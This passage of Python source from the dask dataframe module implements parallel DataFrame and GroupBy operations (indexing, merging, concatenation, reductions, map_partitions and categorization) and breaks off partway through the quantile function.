@property\n def _args(self):\n return (self.dask, self._name, self.columns, self.divisions)\n\n @property\n def _constructor_sliced(self):\n return Series\n\n @property\n def _constructor(self):\n return DataFrame\n\n @property\n def _empty_partition(self):\n \"\"\" Return empty dummy to emulate the result \"\"\"\n return self._partition_type(columns=self.columns)\n\n def __getitem__(self, key):\n if np.isscalar(key):\n name = '{0}.{1}'.format(self._name, key)\n if key in self.columns:\n dsk = dict(((name, i), (operator.getitem, (self._name, i), key))\n for i in range(self.npartitions))\n return self._constructor_sliced(merge(self.dask, dsk), name,\n key, self.divisions)\n else:\n raise KeyError(key)\n if isinstance(key, list):\n name = '%s[%s]' % (self._name, str(key))\n if all(k in self.columns for k in key):\n dsk = dict(((name, i), (operator.getitem,\n (self._name, i),\n (list, key)))\n for i in range(self.npartitions))\n return self._constructor(merge(self.dask, dsk), name,\n key, self.divisions)\n else:\n raise KeyError([k for k in key if k not in self.columns])\n if isinstance(key, Series):\n if self.divisions != key.divisions:\n from .multi import _maybe_align_partitions\n self, key = _maybe_align_partitions([self, key])\n name = 'series-slice-%s[%s]' % (self._name, key._name)\n dsk = dict(((name, i), (self._partition_type._getitem_array,\n (self._name, i),\n (key._name, i)))\n for i in range(self.npartitions))\n return self._constructor(merge(self.dask, key.dask, dsk), name,\n self.columns, self.divisions)\n raise NotImplementedError(key)\n\n def __getattr__(self, key):\n try:\n return object.__getattribute__(self, key)\n except AttributeError as e:\n try:\n return self[key]\n except KeyError as e:\n raise AttributeError(e)\n\n def __dir__(self):\n return sorted(set(dir(type(self)) + list(self.__dict__) +\n list(self.columns)))\n\n def __repr__(self):\n return (\"dd.DataFrame<%s, divisions=%s>\" %\n (self._name, repr_long_list(self.divisions)))\n\n @property\n def ndim(self):\n \"\"\" Return dimensionality \"\"\"\n return 2\n\n @property\n def dtypes(self):\n \"\"\" Return data types \"\"\"\n return self._get(self.dask, self._keys()[0]).dtypes\n\n @wraps(pd.DataFrame.set_index)\n def set_index(self, other, **kwargs):\n from .shuffle import set_index\n return set_index(self, other, **kwargs)\n\n def set_partition(self, column, divisions, **kwargs):\n \"\"\" Set explicit divisions for new column index\n\n >>> df2 = df.set_partition('new-index-column', divisions=[10, 20, 50]) # doctest: +SKIP\n\n See also:\n set_index\n \"\"\"\n from .shuffle import set_partition\n return set_partition(self, column, divisions, **kwargs)\n\n @property\n def column_info(self):\n \"\"\" Return DataFrame.columns \"\"\"\n return self.columns\n\n def nlargest(self, n=5, columns=None):\n \"\"\"\n Return the rows which contain the largest n elements from the provided\n column, in descending order.\n \"\"\"\n return nlargest(self, n, columns)\n\n @wraps(pd.DataFrame.groupby)\n def groupby(self, key, **kwargs):\n return GroupBy(self, key, **kwargs)\n\n def categorize(self, columns=None, **kwargs):\n return categorize(self, columns, **kwargs)\n\n @wraps(pd.DataFrame.assign)\n def assign(self, **kwargs):\n pairs = list(sum(kwargs.items(), ()))\n\n # Figure out columns of the output\n df = pd.DataFrame(columns=self.columns)\n df2 = df.assign(**dict((k, []) for k in kwargs))\n\n return elemwise(_assign, self, *pairs, columns=list(df2.columns))\n\n @wraps(pd.DataFrame.rename)\n def rename(self, index=None, columns=None):\n if index is not None:\n raise ValueError(\"Cannot rename index.\")\n column_info = (pd.DataFrame(columns=self.column_info)\n .rename(columns=columns).columns)\n func = pd.DataFrame.rename\n # *args here is index, columns but columns arg is already used\n return map_partitions(func, column_info, self, None, columns)\n\n def query(self, expr, **kwargs):\n \"\"\" Blocked version of pd.DataFrame.query\n\n This is like the sequential version except that this will also happen\n in many threads. This may conflict with ``numexpr`` which will use\n multiple threads itself. We recommend that you set numexpr to use a\n single thread\n\n import numexpr\n numexpr.set_nthreads(1)\n\n The original docstring follows below:\\n\n \"\"\" + pd.DataFrame.query.__doc__\n name = '%s.query(%s)' % (self._name, expr)\n if kwargs:\n name = name + '--' + tokenize(kwargs)\n dsk = dict(((name, i), (apply, pd.DataFrame.query,\n ((self._name, i), (expr,), kwargs)))\n for i in range(self.npartitions))\n else:\n dsk = dict(((name, i), (pd.DataFrame.query, (self._name, i), expr))\n for i in range(self.npartitions))\n\n return self._constructor(merge(dsk, self.dask), name,\n self.columns, self.divisions)\n\n @wraps(pd.DataFrame.dropna)\n def dropna(self, how='any', subset=None):\n def f(df, how=how, subset=subset):\n return df.dropna(how=how, subset=subset)\n return map_partitions(f, self.columns, self)\n\n def to_castra(self, fn=None, categories=None, sorted_index_column=None,\n compute=True):\n \"\"\" Write DataFrame to Castra on-disk store\n\n See https://github.com/blosc/castra for details\n\n See Also:\n Castra.to_dask\n \"\"\"\n from .io import to_castra\n return to_castra(self, fn, categories, sorted_index_column,\n compute=compute)\n\n def to_bag(self, index=False):\n \"\"\"Convert to a dask Bag of tuples of each row.\n\n Parameters\n ----------\n index : bool, optional\n If True, the index is included as the first element of each tuple.\n Default is False.\n \"\"\"\n from .io import to_bag\n return to_bag(self, index)\n\n @cache_readonly\n def _numeric_columns(self):\n # Cache to avoid repeated calls\n dummy = self._get(self.dask, self._keys()[0])._get_numeric_data()\n return dummy.columns.tolist()\n\n @wraps(pd.DataFrame._get_numeric_data)\n def _get_numeric_data(self, how='any', subset=None):\n if len(self._numeric_columns) < len(self.columns):\n name = self._token_prefix + '-get_numeric_data'\n return map_partitions(pd.DataFrame._get_numeric_data,\n self._numeric_columns, self, token=name)\n else:\n # use current data if unchanged\n return self\n\n @classmethod\n def _validate_axis(cls, axis=0):\n if axis not in (0, 1, 'index', 'columns', None):\n raise ValueError('No axis named {0}'.format(axis))\n # convert to numeric axis\n return {None: 0, 'index': 0, 'columns': 1}.get(axis, axis)\n\n def _aca_agg(self, token, func, aggfunc=None):\n \"\"\" Wrapper for aggregations \"\"\"\n if aggfunc is None:\n aggfunc = func\n\n return aca([self], chunk=func,\n aggregate=lambda x: aggfunc(x.groupby(level=0)),\n columns=None, token=self._token_prefix + token)\n\n @property\n def _elemwise_cols(self):\n return self.columns\n\n @wraps(pd.DataFrame.drop)\n def drop(self, labels, axis=0):\n if axis != 1:\n raise NotImplementedError(\"Drop currently only works for axis=1\")\n\n columns = list(pd.DataFrame(columns=self.columns)\n .drop(labels, axis=axis)\n .columns)\n return elemwise(pd.DataFrame.drop, self, labels, axis, columns=columns)\n\n @wraps(pd.DataFrame.merge)\n def merge(self, right, how='inner', on=None, left_on=None, right_on=None,\n left_index=False, right_index=False,\n suffixes=('_x', '_y'), npartitions=None):\n\n if not isinstance(right, (DataFrame, pd.DataFrame)):\n raise ValueError('right must be DataFrame')\n\n from .multi import merge\n return merge(self, right, how=how, on=on,\n left_on=left_on, right_on=right_on,\n left_index=left_index, right_index=right_index,\n suffixes=suffixes, npartitions=npartitions)\n\n @wraps(pd.DataFrame.join)\n def join(self, other, on=None, how='left',\n lsuffix='', rsuffix='', npartitions=None):\n\n if not isinstance(other, (DataFrame, pd.DataFrame)):\n raise ValueError('other must be DataFrame')\n\n from .multi import merge\n return merge(self, other, how=how,\n left_index=on is None, right_index=True,\n left_on=on, suffixes=[lsuffix, rsuffix],\n npartitions=npartitions)\n\n @classmethod\n def _bind_operator_method(cls, name, op):\n \"\"\" bind operator method like DataFrame.add to this class \"\"\"\n\n # name must be explicitly passed for div method whose name is truediv\n\n def meth(self, other, axis='columns', level=None, fill_value=None):\n if level is not None:\n raise NotImplementedError('level must be None')\n\n axis = self._validate_axis(axis)\n\n right = None\n if axis == 1:\n # when axis=1, series will be added to each row\n # it not supported for dd.Series.\n # dd.DataFrame is not affected as op is applied elemwise\n if isinstance(other, Series):\n msg = 'Unable to {0} dd.Series with axis=1'.format(name)\n raise ValueError(msg)\n elif isinstance(other, pd.Series):\n right = other.index\n if isinstance(other, (DataFrame, pd.DataFrame)):\n right = other.columns\n\n if right is not None:\n left = pd.DataFrame(columns=self.columns)\n right = pd.DataFrame(columns=right)\n columns = op(left, right, axis=axis).columns.tolist()\n else:\n columns = self.columns\n\n return map_partitions(op, columns, self, other,\n axis=axis, fill_value=fill_value)\n meth.__doc__ = op.__doc__\n bind_method(cls, name, meth)\n\n def apply(self, func, axis=0, args=(), columns=no_default, **kwds):\n \"\"\" Parallel version of pandas.DataFrame.apply\n\n This mimics the pandas version except for the following:\n\n 1. The user must specify axis=0 explicitly\n 2. The user must provide output columns or column\n \"\"\"\n if axis == 0:\n raise NotImplementedError(\n \"dd.DataFrame.apply only supports axis=1\\n\"\n \" Try: df.apply(func, axis=1)\")\n\n if columns is no_default:\n raise ValueError(\n \"Please supply column names of output dataframe or series\\n\"\n \" Before: df.apply(func)\\n\"\n \" After: df.apply(func, columns=['x', 'y']) for dataframe result\\n\"\n \" or: df.apply(func, columns='x') for series result\")\n\n return map_partitions(pd.DataFrame.apply, columns, self, func, axis,\n False, False, None, args, **kwds)\n\n\n# bind operators\nfor op in [operator.abs, operator.add, operator.and_, operator_div,\n operator.eq, operator.gt, operator.ge, operator.inv,\n operator.lt, operator.le, operator.mod, operator.mul,\n operator.ne, operator.neg, operator.or_, operator.pow,\n operator.sub, operator.truediv, operator.floordiv, operator.xor]:\n _Frame._bind_operator(op)\n Scalar._bind_operator(op)\n\nfor name in ['add', 'sub', 'mul', 'div',\n 'truediv', 'floordiv', 'mod', 'pow',\n 'radd', 'rsub', 'rmul', 'rdiv',\n 'rtruediv', 'rfloordiv', 'rmod', 'rpow']:\n meth = getattr(pd.DataFrame, name)\n DataFrame._bind_operator_method(name, meth)\n\n meth = getattr(pd.Series, name)\n Series._bind_operator_method(name, meth)\n\n\ndef elemwise_property(attr, s):\n return map_partitions(getattr, s.name, s, attr)\n\nfor name in ['nanosecond', 'microsecond', 'millisecond', 'second', 'minute',\n 'hour', 'day', 'week', 'month', 'quarter', 'year']:\n setattr(Index, name, property(partial(elemwise_property, name)))\n\n\ndef nlargest(df, n=5, columns=None):\n if isinstance(df, Index):\n raise AttributeError(\"nlargest is not available for Index objects\")\n elif isinstance(df, Series):\n token = 'series-nlargest-n={0}'.format(n)\n f = lambda s: s.nlargest(n)\n elif isinstance(df, DataFrame):\n token = 'dataframe-nlargest-n={0}'.format(n)\n f = lambda df: df.nlargest(n, columns)\n columns = df.columns # this is a hack.\n return aca(df, f, f, columns=columns, token=token)\n\n\ndef _assign(df, *pairs):\n kwargs = dict(partition(2, pairs))\n return df.assign(**kwargs)\n\n\ndef _partition_of_index_value(divisions, val):\n \"\"\" In which partition does this value lie?\n\n >>> _partition_of_index_value([0, 5, 10], 3)\n 0\n >>> _partition_of_index_value([0, 5, 10], 8)\n 1\n >>> _partition_of_index_value([0, 5, 10], 100)\n 1\n >>> _partition_of_index_value([0, 5, 10], 5) # left-inclusive divisions\n 1\n \"\"\"\n if divisions[0] is None:\n raise ValueError(\n \"Can not use loc on DataFrame without known divisions\")\n val = _coerce_loc_index(divisions, val)\n i = bisect.bisect_right(divisions, val)\n return min(len(divisions) - 2, max(0, i - 1))\n\n\ndef _loc(df, start, stop, include_right_boundary=True):\n \"\"\"\n\n >>> df = pd.DataFrame({'x': [10, 20, 30, 40, 50]}, index=[1, 2, 2, 3, 4])\n >>> _loc(df, 2, None)\n x\n 2 20\n 2 30\n 3 40\n 4 50\n >>> _loc(df, 1, 3)\n x\n 1 10\n 2 20\n 2 30\n 3 40\n >>> _loc(df, 1, 3, include_right_boundary=False)\n x\n 1 10\n 2 20\n 2 30\n \"\"\"\n result = df.loc[start:stop]\n if not include_right_boundary:\n right_index = result.index.get_slice_bound(stop, 'left',\n result.index.inferred_type)\n result = result.iloc[:right_index]\n return result\n\n\ndef _coerce_loc_index(divisions, o):\n \"\"\" Transform values to be comparable against divisions\n\n This is particularly valuable to use with pandas datetimes\n \"\"\"\n if divisions and isinstance(divisions[0], datetime):\n return pd.Timestamp(o)\n if divisions and isinstance(divisions[0], np.datetime64):\n return np.datetime64(o)\n return o\n\n\ndef consistent_name(names):\n \"\"\" New name for series in elementwise operation\n\n If all truthy names are the same, choose that one, otherwise, choose None\n \"\"\"\n allnames = set()\n for name in names:\n if name is None:\n continue\n if isinstance(name, (tuple, list)):\n allnames.update(name)\n else:\n allnames.add(name)\n\n if len(allnames) == 1:\n return first(allnames)\n else:\n return None\n\n\ndef elemwise(op, *args, **kwargs):\n \"\"\" Elementwise operation for dask.Dataframes \"\"\"\n columns = kwargs.get('columns', None)\n name = kwargs.get('name', None)\n\n _name = 'elemwise-' + tokenize(op, kwargs, *args)\n\n args = _maybe_from_pandas(args)\n\n from .multi import _maybe_align_partitions\n args = _maybe_align_partitions(args)\n dasks = [arg for arg in args if isinstance(arg, (_Frame, Scalar))]\n dfs = [df for df in dasks if isinstance(df, _Frame)]\n divisions = dfs[0].divisions\n n = len(divisions) - 1\n\n other = [(i, arg) for i, arg in enumerate(args)\n if not isinstance(arg, (_Frame, Scalar))]\n\n if other:\n op2 = partial_by_order(op, other)\n else:\n op2 = op\n\n # adjust the key length of Scalar\n keys = [d._keys() * n if isinstance(d, Scalar)\n else d._keys() for d in dasks]\n\n dsk = dict(((_name, i), (op2,) + frs) for i, frs in enumerate(zip(*keys)))\n dsk = merge(dsk, *[d.dask for d in dasks])\n\n if columns is not None:\n return DataFrame(dsk, _name, columns, divisions)\n else:\n column_name = name or consistent_name(n for df in dfs\n for n in df.columns)\n return Series(dsk, _name, column_name, divisions)\n\n\ndef remove_empties(seq):\n \"\"\" Remove items of length 0\n\n >>> remove_empties([1, 2, ('empty', np.nan), 4, 5])\n [1, 2, 4, 5]\n\n >>> remove_empties([('empty', np.nan)])\n [nan]\n\n >>> remove_empties([])\n []\n \"\"\"\n if not seq:\n return seq\n\n seq2 = [x for x in seq\n if not (isinstance(x, tuple) and x and x[0] == 'empty')]\n if seq2:\n return seq2\n else:\n return [seq[0][1]]\n\n\ndef empty_safe(func, arg):\n \"\"\"\n\n >>> empty_safe(sum, [1, 2, 3])\n 6\n >>> empty_safe(sum, [])\n ('empty', 0)\n \"\"\"\n if len(arg) == 0:\n return ('empty', func(arg))\n else:\n return func(arg)\n\n\ndef reduction(x, chunk, aggregate, token=None):\n \"\"\" General version of reductions\n\n >>> reduction(my_frame, np.sum, np.sum) # doctest: +SKIP\n \"\"\"\n token_key = tokenize(x, token or (chunk, aggregate))\n token = token or 'reduction'\n a = '{0}--chunk-{1}'.format(token, token_key)\n dsk = dict(((a, i), (empty_safe, chunk, (x._name, i)))\n for i in range(x.npartitions))\n\n b = '{0}--aggregation-{1}'.format(token, token_key)\n dsk2 = {(b, 0): (aggregate, (remove_empties,\n [(a,i) for i in range(x.npartitions)]))}\n\n return Scalar(merge(x.dask, dsk, dsk2), b)\n\n\ndef _concat_dfs(dfs, name, join='outer'):\n \"\"\" Internal function to concat dask dict and DataFrame.columns \"\"\"\n dsk = dict()\n i = 0\n\n empties = [df._empty_partition for df in dfs]\n result = pd.concat(empties, axis=0, join=join)\n if isinstance(result, pd.Series):\n columns = result.name\n else:\n columns = result.columns.tolist()\n\n for df in dfs:\n if columns != df.columns:\n df = df[[c for c in columns if c in df.columns]]\n dsk = merge(dsk, df.dask)\n\n for key in df._keys():\n dsk[(name, i)] = key\n i += 1\n\n return dsk, columns\n\ndef _maybe_from_pandas(dfs):\n from .io import from_pandas\n dfs = [from_pandas(df, 1) if isinstance(df, (pd.DataFrame, pd.Series))\n else df for df in dfs]\n return dfs\n\n\ndef concat(dfs, axis=0, join='outer', interleave_partitions=False):\n \"\"\" Concatenate DataFrames along rows.\n\n - When axis=0 (default), concatenate DataFrames row-wise:\n - If all divisions are known and ordered, concatenate DataFrames keeping\n divisions. When divisions are not ordered, specifying\n interleave_partition=True allows concatenate divisions each by each.\n - If any of division is unknown, concatenate DataFrames resetting its\n division to unknown (None)\n - When axis=1, concatenate DataFrames column-wise:\n - Allowed if all divisions are known.\n - If any of division is unknown, it raises ValueError.\n\n Parameters\n ----------\n\n dfs: list\n List of dask.DataFrames to be concatenated\n axis: {0, 1, 'index', 'columns'}, default 0\n The axis to concatenate along\n join : {'inner', 'outer'}, default 'outer'\n How to handle indexes on other axis\n interleave_partitions: bool, default False\n Whether to concatenate DataFrames ignoring its order. If True, every\n divisions are concatenated each by each.\n\n Examples\n --------\n\n # If all divisions are known and ordered, divisions are kept.\n >>> a # doctest: +SKIP\n dd.DataFrame\n >>> b # doctest: +SKIP\n dd.DataFrame\n >>> dd.concat([a, b]) # doctest: +SKIP\n dd.DataFrame\n\n # Unable to concatenate if divisions are not ordered.\n >>> a # doctest: +SKIP\n dd.DataFrame\n >>> b # doctest: +SKIP\n dd.DataFrame\n >>> dd.concat([a, b]) # doctest: +SKIP\n ValueError: All inputs have known divisions which cannnot be concatenated\n in order. Specify interleave_partitions=True to ignore order\n\n # Specify interleave_partitions=True to ignore the division order.\n >>> dd.concat([a, b], interleave_partitions=True) # doctest: +SKIP\n dd.DataFrame\n\n # If any of division is unknown, the result division will be unknown\n >>> a # doctest: +SKIP\n dd.DataFrame\n >>> b # doctest: +SKIP\n dd.DataFrame\n >>> dd.concat([a, b]) # doctest: +SKIP\n dd.DataFrame\n \"\"\"\n if not isinstance(dfs, list):\n dfs = [dfs]\n if len(dfs) == 0:\n raise ValueError('Input must be a list longer than 0')\n\n if not join in ('inner', 'outer'):\n raise ValueError(\"'join' must be 'inner' or 'outer'\")\n\n axis = DataFrame._validate_axis(axis)\n dasks = [df for df in dfs if isinstance(df, _Frame)]\n\n if all(df.known_divisions for df in dasks):\n # must be converted here to check whether divisions can be\n # concatenated\n dfs = _maybe_from_pandas(dfs)\n if axis == 1:\n from .multi import concat_indexed_dataframes\n return concat_indexed_dataframes(dfs, axis=axis, join=join)\n else:\n # each DataFrame's division must be greater than previous one\n if all(dfs[i].divisions[-1] < dfs[i + 1].divisions[0]\n for i in range(len(dfs) - 1)):\n name = 'concat-{0}'.format(tokenize(*dfs))\n dsk, columns = _concat_dfs(dfs, name, join=join)\n\n divisions = []\n for df in dfs[:-1]:\n # remove last to concatenate with next\n divisions += df.divisions[:-1]\n divisions += dfs[-1].divisions\n\n return_type = _get_return_type(dfs[0], columns)\n return return_type(merge(dsk, *[df.dask for df in dfs]), name,\n columns, divisions)\n else:\n if interleave_partitions:\n from .multi import concat_indexed_dataframes\n return concat_indexed_dataframes(dfs, join=join)\n\n raise ValueError('All inputs have known divisions which cannnot '\n 'be concatenated in order. Specify '\n 'interleave_partitions=True to ignore order')\n\n else:\n if axis == 1:\n raise ValueError('Unable to concatenate DataFrame with unknown '\n 'division specifying axis=1')\n else:\n # concat will not regard Series as row\n dfs = _maybe_from_pandas(dfs)\n name = 'concat-{0}'.format(tokenize(*dfs))\n dsk, columns = _concat_dfs(dfs, name, join=join)\n\n divisions = [None] * (sum([df.npartitions for df in dfs]) + 1)\n\n return_type = _get_return_type(dfs[0], columns)\n return return_type(merge(dsk, *[df.dask for df in dfs]), name,\n columns, divisions)\n\n\ndef _groupby_apply(df, ind, func):\n return df.groupby(ind).apply(func)\n\ndef _groupby_apply_level0(df, func):\n return df.groupby(level=0).apply(func)\n\ndef _groupby_getitem_apply(df, ind, key, func):\n return df.groupby(ind)[key].apply(func)\n\ndef _groupby_level0_getitem_apply(df, key, func):\n return df.groupby(level=0)[key].apply(func)\n\ndef _groupby_get_group(df, by_key, get_key, columns):\n grouped = df.groupby(by_key)\n if isinstance(columns, tuple):\n columns = list(columns)\n if get_key in grouped.groups:\n return grouped[columns].get_group(get_key)\n else:\n # to create empty DataFrame/Series, which has the same\n # dtype as the original\n return df[0:0][columns]\n\n\nclass _GroupBy(object):\n\n def _aca_agg(self, token, func, aggfunc=None):\n if aggfunc is None:\n aggfunc = func\n\n if isinstance(self.index, Series):\n\n def chunk(df, index, func=func, key=self.key):\n if isinstance(df, pd.Series):\n return func(df.groupby(index))\n else:\n return func(df.groupby(index)[key])\n\n agg = lambda df: aggfunc(df.groupby(level=0))\n token = self._token_prefix + token\n\n return aca([self.df, self.index], chunk=chunk, aggregate=agg,\n columns=self.key, token=token)\n else:\n def chunk(df, index=self.index, func=func, key=self.key):\n return func(df.groupby(index)[key])\n\n if isinstance(self.index, list):\n levels = list(range(len(self.index)))\n else:\n levels = 0\n agg = lambda df: aggfunc(df.groupby(level=levels))\n token = self._token_prefix + token\n\n return aca(self.df, chunk=chunk, aggregate=agg,\n columns=self.key, token=token)\n\n @wraps(pd.core.groupby.GroupBy.sum)\n def sum(self):\n return self._aca_agg(token='sum', func=lambda x: x.sum())\n\n @wraps(pd.core.groupby.GroupBy.min)\n def min(self):\n return self._aca_agg(token='min', func=lambda x: x.min())\n\n @wraps(pd.core.groupby.GroupBy.max)\n def max(self):\n return self._aca_agg(token='max', func=lambda x: x.max())\n\n @wraps(pd.core.groupby.GroupBy.count)\n def count(self):\n return self._aca_agg(token='count', func=lambda x: x.count(),\n aggfunc=lambda x: x.sum())\n\n @wraps(pd.core.groupby.GroupBy.mean)\n def mean(self):\n return 1.0 * self.sum() / self.count()\n\n def get_group(self, key):\n token = self._token_prefix + 'get_group'\n return map_partitions(_groupby_get_group, self.column_info,\n self.df,\n self.index, key, self.column_info, token=token)\n\n\nclass GroupBy(_GroupBy):\n\n _token_prefix = 'dataframe-groupby-'\n\n def __init__(self, df, index=None, key=None, **kwargs):\n self.df = df\n self.index = index\n self.kwargs = kwargs\n\n if isinstance(index, list):\n for i in index:\n if i not in df.columns:\n raise KeyError(\"Columns not found: '{0}'\".format(i))\n _key = [c for c in df.columns if c not in index]\n\n elif isinstance(index, Series):\n assert index.divisions == df.divisions\n # check whether given Series is taken from given df and unchanged.\n # If any operations are performed, _name will be changed to\n # e.g. \"elemwise-xxxx\"\n if (index.name is not None and\n index._name == self.df._name + '.' + index.name):\n _key = [c for c in df.columns if c != index.name]\n else:\n _key = list(df.columns)\n else:\n if index not in df.columns:\n raise KeyError(\"Columns not found: '{0}'\".format(index))\n _key = [c for c in df.columns if c != index]\n\n self.key = key or _key\n\n @property\n def column_info(self):\n return self.df.columns\n\n def apply(self, func, columns=None):\n \"\"\" Apply function to each group.\n\n If the grouper does not align with the index then this causes a full\n shuffle. The order of rows within each group may not be preserved.\n \"\"\"\n if (isinstance(self.index, Series) and\n self.index._name == self.df.index._name):\n df = self.df\n return map_partitions(_groupby_apply_level0,\n columns or self.df.columns,\n self.df, func)\n else:\n from .shuffle import shuffle\n # df = set_index(self.df, self.index, **self.kwargs)\n df = shuffle(self.df, self.index, **self.kwargs)\n return map_partitions(_groupby_apply,\n columns or self.df.columns,\n self.df, self.index, func)\n\n def __getitem__(self, key):\n if isinstance(key, list):\n for k in key:\n if k not in self.df.columns:\n raise KeyError(\"Columns not found: '{0}'\".format(k))\n return GroupBy(self.df, index=self.index, key=key, **self.kwargs)\n else:\n if key not in self.df.columns:\n raise KeyError(\"Columns not found: '{0}'\".format(key))\n return SeriesGroupBy(self.df, self.index, key)\n\n def __dir__(self):\n return sorted(set(dir(type(self)) + list(self.__dict__) +\n list(self.df.columns)))\n\n def __getattr__(self, key):\n try:\n return object.__getattribute__(self, key)\n except AttributeError:\n try:\n return self[key]\n except KeyError:\n raise AttributeError()\n\n\nclass SeriesGroupBy(_GroupBy):\n\n _token_prefix = 'series-groupby-'\n\n def __init__(self, df, index, key=None, **kwargs):\n self.df = df\n self.index = index\n self.key = key\n self.kwargs = kwargs\n\n if isinstance(df, Series):\n if not isinstance(index, Series):\n raise TypeError(\"A dask Series must be used as the index for a\"\n \" Series groupby.\")\n if not df.divisions == index.divisions:\n raise NotImplementedError(\"The Series and index of the groupby\"\n \" must have the same divisions.\")\n\n @property\n def column_info(self):\n return self.key\n\n def apply(self, func, columns=None):\n \"\"\" Apply function to each group.\n\n If the grouper does not align with the index then this causes a full\n shuffle. The order of rows within each group may not be preserved.\n \"\"\"\n # df = set_index(self.df, self.index, **self.kwargs)\n if self.index._name == self.df.index._name:\n df = self.df\n return map_partitions(_groupby_level0_getitem_apply,\n self.df, self.key, func,\n columns=columns)\n else:\n from .shuffle import shuffle\n df = shuffle(self.df, self.index, **self.kwargs)\n return map_partitions(_groupby_apply,\n columns or self.df.columns,\n self.df, self.index, func)\n\n def nunique(self):\n def chunk(df, index):\n # we call set_index here to force a possibly duplicate index\n # for our reduce step\n grouped = (df.groupby(index)\n .apply(pd.DataFrame.drop_duplicates, subset=self.key))\n grouped.index = grouped.index.get_level_values(level=0)\n return grouped\n\n def agg(df):\n return df.groupby(level=0)[self.key].nunique()\n\n return aca([self.df, self.index],\n chunk=chunk, aggregate=agg, columns=self.key,\n token='series-groupby-nunique')\n\n\ndef apply_concat_apply(args, chunk=None, aggregate=None,\n columns=no_default, token=None):\n \"\"\" Apply a function to blocks, the concat, then apply again\n\n Parameters\n ----------\n\n args: dask.DataFrames\n All Dataframes should be partitioned and indexed equivalently\n chunk: function [block-per-arg] -> block\n Function to operate on each block of data\n aggregate: function concatenated-block -> block\n Function to operate on the concatenated result of chunk\n\n >>> def chunk(a_block, b_block):\n ... pass\n\n >>> def agg(df):\n ... pass\n\n >>> apply_concat_apply([a, b], chunk=chunk, aggregate=agg) # doctest: +SKIP\n \"\"\"\n if not isinstance(args, (tuple, list)):\n args = [args]\n\n assert all(arg.npartitions == args[0].npartitions\n for arg in args\n if isinstance(arg, _Frame))\n\n token_key = tokenize(token or (chunk, aggregate), columns, *args)\n token = token or 'apply-concat-apply'\n\n a = '{0}--first-{1}'.format(token, token_key)\n dsk = dict(((a, i), (apply, chunk, (list, [(x._name, i)\n if isinstance(x, _Frame)\n else x for x in args])))\n for i in range(args[0].npartitions))\n\n b = '{0}--second-{1}'.format(token, token_key)\n dsk2 = {(b, 0): (aggregate,\n (_concat,\n (list, [(a, i) for i in range(args[0].npartitions)])))}\n\n if columns == no_default:\n return_type = type(args[0])\n columns = None\n else:\n return_type = _get_return_type(args[0], columns)\n\n dasks = [a.dask for a in args if isinstance(a, _Frame)]\n return return_type(merge(dsk, dsk2, *dasks), b, columns, [None, None])\n\n\naca = apply_concat_apply\n\n\ndef _get_return_type(arg, columns):\n \"\"\" Get the class of the result\n\n - When columns is str/unicode, the result is:\n - Scalar when columns is ``return_scalar``\n - Index if arg is Index\n - Series otherwise\n - Otherwise, result is DataFrame.\n \"\"\"\n\n if (isinstance(columns, (str, unicode)) or not\n isinstance(columns, Iterable)):\n\n if columns == return_scalar:\n return Scalar\n\n elif isinstance(arg, Index):\n return Index\n else:\n return Series\n else:\n return DataFrame\n\n\ndef map_partitions(func, columns, *args, **kwargs):\n \"\"\" Apply Python function on each DataFrame block\n\n column_info: tuple or string\n Column names or name of the output\n targets: list\n List of target DataFrame / Series.\n \"\"\"\n assert callable(func)\n token = kwargs.pop('token', 'map-partitions')\n token_key = tokenize(token or func, columns, kwargs, *args)\n name = '{0}-{1}'.format(token, token_key)\n\n if all(isinstance(arg, Scalar) for arg in args):\n dask = {(name, 0):\n (apply, func, (tuple, [(arg._name, 0) for arg in args]), kwargs)}\n return Scalar(merge(dask, *[arg.dask for arg in args]), name)\n\n args = _maybe_from_pandas(args)\n\n if columns is no_default:\n columns = None\n\n from .multi import _maybe_align_partitions\n args = _maybe_align_partitions(args)\n dfs = [df for df in args if isinstance(df, _Frame)]\n\n return_type = _get_return_type(dfs[0], columns)\n dsk = {}\n for i in range(dfs[0].npartitions):\n values = [(arg._name, i if isinstance(arg, _Frame) else 0)\n if isinstance(arg, (_Frame, Scalar)) else arg for arg in args]\n dsk[(name, i)] = (_rename, columns, (apply, func, (tuple, values),\n kwargs))\n\n dasks = [arg.dask for arg in args if isinstance(arg, (_Frame, Scalar))]\n\n return return_type(merge(dsk, *dasks), name, columns, args[0].divisions)\n\n\ndef _rename(columns, df):\n \"\"\" Rename columns in dataframe or series \"\"\"\n if isinstance(columns, Iterator):\n columns = list(columns)\n if columns is no_default:\n return df\n if isinstance(df, pd.DataFrame) and len(columns) == len(df.columns):\n return df.rename(columns=dict(zip(df.columns, columns)))\n elif isinstance(df, pd.Series):\n return pd.Series(df, name=columns)\n else:\n return df\n\n\ndef categorize_block(df, categories):\n \"\"\" Categorize a dataframe with given categories\n\n df: DataFrame\n categories: dict mapping column name to iterable of categories\n \"\"\"\n df = df.copy()\n for col, vals in categories.items():\n df[col] = pd.Categorical(df[col], categories=vals, ordered=False)\n return df\n\n\ndef categorize(df, columns=None, **kwargs):\n \"\"\"\n Convert columns of dataframe to category dtype\n\n This aids performance, both in-memory and in spilling to disk\n \"\"\"\n if columns is None:\n dtypes = df.dtypes\n columns = [name for name, dt in zip(dtypes.index, dtypes.values)\n if dt == 'O']\n if not isinstance(columns, (list, tuple)):\n columns = [columns]\n\n distincts = [df[col].drop_duplicates() for col in columns]\n values = compute(*distincts, **kwargs)\n\n func = partial(categorize_block, categories=dict(zip(columns, values)))\n return df.map_partitions(func, columns=df.columns)\n\n\ndef quantile(df, q):\n \"\"\" Approximate quantiles of Series / single column DataFrame\n\n Parameters\n ----------\n q : list/array of floats\n Iterable of numbers ranging from 0 to 100 for the desired quantiles\n \"\"\"\n assert len(df.columns) == 1\n from dask.array.percentile import _percentile, merge_percentiles\n\n # currently, only Series has quantile method\n if isinstance(q, (list, tuple, np.ndarray)):\n # make Series\n merge_type = lambda v: df._partition_type(v, index=q, name=df.name)\n return_type = df._constructor\n if issubclass(return_type, Index):\n return_type = Series\n else:\n merge_type = lambda v: df._partition_type(v).item()\n return_type = df._constructor_sliced\n q = [q]\n\n # pandas uses quantile in [0, 1]\n # numpy / everyone else uses [0, 100]\n qs = np.asarray(q) * 100\n token = tokenize(df, qs)\n\n if len(qs) == 0:\n name = 'quantiles-' + token\n return Series({(name, 0): pd.Series([], name=df.name)},\n name, df.name, [None, None])\n else:\n new_divisions = [np.min(q), np.max(q)]\n\n name = 'quantiles-1-' + token\n val_dsk = dict(((name, i), (_percentile, (getattr, key, 'values'), qs))\n for i, key in enumerate(df._keys()))\n name2 = 'quantiles-2-' + 